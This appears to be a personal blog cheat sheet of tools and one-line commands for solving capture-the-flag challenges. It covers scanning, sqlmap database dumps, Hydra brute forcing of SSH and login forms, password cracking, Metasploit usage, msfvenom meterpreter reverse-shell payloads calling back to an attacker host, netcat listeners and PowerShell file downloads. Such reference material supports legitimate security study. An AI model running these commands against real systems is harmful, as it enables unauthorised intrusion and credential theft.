GitHub icon LinkedIn icon d="M6.667 4h18.667c1.467 0 2.667 1.2 2.667 2.667v18.667c0 1.467-1.2 2.667-2.667 2.667H6.667A2.675 2.675 0 0 1 4 25.334V6.667C4 5.2 5.2 4 6.667 4zm16.946 8.44c.64-.533 1.387-1.173 1.72-1.88-.547.28-1.2.453-1.92.547.667-.48 1.>

ToolBox

ToolBox
Photo by Barn Images / Unsplash

Last Update : 05/18/2022

💡
This page is a temporary one, a more definitive version is under construction at wiki.d3vyce.fr.

The objective of this blog page is to gather the different tools I use on a daily basis to solve CTF. This article will evolve and be enriched as time goes by.

I recommend these blogs if you are looking to learn new things in Pentesting:

HacknDo Blog
HackTricks Blog

Online Tools

Exploit-DB
CTF Tools

CyberChef
Crackstation
Hash Analyser
FotoForensics

Run Code Online

Linux Tools

Nmap

nmap documentation
nmap script list

Basic Scan : nmap -sV -T4 -Pn [IP]
UDP Scan : sudo nmap -sU --min-rate 5000 [IP]
SMB Scan : nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse [IP]
SMB Scan bis : nmap -p445,135,139 --script="safe or smb-enum-*" [IP]
RPC Scan : nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount [IP]

FFUF

Wordlists

Directory scan : ffuf -c -u http://[IP]/FUZZ -w common.txt -recursion -recursion-depth 2
Subdomain scan : ffuf -c -u http://[IP] -w subdomains.txt -H "Host: FUZZ.[IP]" -fw xx

SQLmap

Injection check : sqlmap -r request.txt --batch
Database listing : sqlmap -r request.txt --dbs --batch
Table listing : sqlmap -r request.txt -D [data_base] --dump --batch
Dump table : sqlmap -r request.txt -D [data_base] -T [table] --dump --batch

request.txt : copy from burp

Hydra

SSH Brute Force : hydra -l jan -P rockyou.txt ssh://[@IP]
Post Form Brute Force : hydra -f -l admin -P /usr/share/wordlists/rockyou.txt [IP] http-post-form “[Page]:VIEWSTATE + USER + PASS: Login failed”

John

SSH : ssh2john.py key.rsa > result.txt
ZIP : zip2john.py file.zip > result.txt
RAR : zip2john.py file.zip > result.txt

john result.txt --wordlist=rockyou.txt

Hashcat

hash number

md5 : hashcat -m 0 hash rockyou.txt

Metasploit

Nmap scan with vulns detection : db_nmap -sV [IP]
List of vulns from nmap scan : vulns
Search for module : search [text]
Use module : use [path_to_module]
List of options for select module : options
Set options value : set [options] [value]
Show running sessions : show sessions
Enter in session (CTRL-Z to pause session) : sessions -i [id_sessions]
List of available payloads : show payloads
Set payload value : set PAYLOAD [payload_name
Start Module : run or exploit

SMB

Check anonymous access : smbclient --no-pass -L //[IP]
User/Share enumeration : enum4linux -a [IP]

Linux Command

Copy file over SSH : scp [FILE] [user]@[IP]:[folder]
Search exploit : searchsploit [NAME]
Download exploit : searchsploit -x [code] > [FILE]
SSH Port Forwarding : ssh -L [local_port]:127.0.0.1:[target_port] -N [target_user]@[target_ip]
File server : python3 -m http.server 8080
Download from file server : wget [ip]:81/[file]
Open port : nc -nlvp 1234
Upgrade reverse shell : python3 -c 'import pty; pty.spawn("/bin/bash")'
List open port : netstat -lntu
Telnet with user : telnet [IP] -l [user]
Mysql with host : mysql -h [IP] -u [user] -p
Find file : find / -name [name] 2>/dev/null
List Cron Job : cat /etc/crontab
Decode Base64 : base64 -d <<< [string]
HTTP Header : curl -I [IP]
Encode Base64 : base64 <<< [string]
Decode Hexa : xxd -r -p <<< [string]

Reverse Shell

Reverse Shell Cheat Sheet
Reverse Shell Generator
Reverse Shell Kali : /usr/share/webshells

Reverse Shell Windows (.exe)

msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=[IP] LPORT=1234 -f exe -o shell.exe
msfvenom -p windows/x64/meterpreter_reverse_tcp lhost=[IP] lport=1234 -f aspx -o shell.aspx

Windows

AD Enumeration

BloodHound

sudo neo4j console
bloodhound

AD Control Paths
Group3r
Snaffler
CrackMapExec

Exploit Suggester Metasploit : post/multi/recon/local_exploit_suggester

Powershell

Import file via Powershell

powershell -c “Invoke-WebRequest -Uri ‘http://[IP]/[File]’ -OutFile ‘c:[…]’”

Privilege Escalation

Linux : linPEAS
Windows : winPEAS

Find SUID file : find / -perm -u=s -type f 2>/dev/null

GTFOBins

OSINT

OSINT Framework
Awesome OSINT
OSINT Techniques

Recon Tools

Maigret
GHunt

Advanced Googleing

Google Search Operators

Exact term search : "[term]"
Exclude term : -[term]
Search within a website : site:[site] "[term]"
Search file type : filetype:[type]
Search in URL : Inurl:[term]
Search in text : Intext:[term]